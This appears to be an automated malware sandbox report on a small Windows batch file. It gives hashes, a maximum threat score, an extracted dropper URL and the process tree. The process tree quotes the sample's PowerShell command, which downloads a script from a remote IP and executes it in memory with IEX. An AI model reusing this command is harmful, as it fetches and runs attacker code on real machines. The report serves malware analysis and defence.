Analysis

max time kernel: 102s
max time network: 150s
platform: windows10_x64
resource: win10v200217
submitted: 19-02-2020 15:44

Static task: static1

Behavioral task: behavioral1
Sample: 42HVHYvi.bat
Resource: win7v200217 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: 42HVHYvi.bat
Resource: win10v200217 (windows10_x64)
0 signatures, 0 seconds
General

Target: 42HVHYvi.bat
Size: 192B
MD5: a9075a0e43612a388eda0d4643037a34
SHA1: 6bfb53b342e2518e07955676e5a8f18717970504
SHA256: 811d39f86a8efff6544dcd852c24a3fe2e5446f5eb7fdd9e740b424a221ab366
SHA512: 9a9275289c65b19cc5e4d94572b1e6dfbe84c47a028193d0c142a363e0b279e0cb217d2d63c759839730ec8158460da427cb9ac354a124a9f6ae73ab7fa063ee
Score: 10/10
Malware Config

Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/42HVHYvi
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  1676  3532        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  1676  WerFault.exe
  Token: SeBackupPrivilege   1676  WerFault.exe
  Token: SeDebugPrivilege    1676  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  1676  WerFault.exe  (same entry recorded 14 times)
Processes

C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\42HVHYvi.bat"
  PID: 3328

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/42HVHYvi');Invoke-OCJPTYYSX;Start-Sleep -s 10000"
    PID: 3532

    C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3532 -s 704
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
      PID: 1676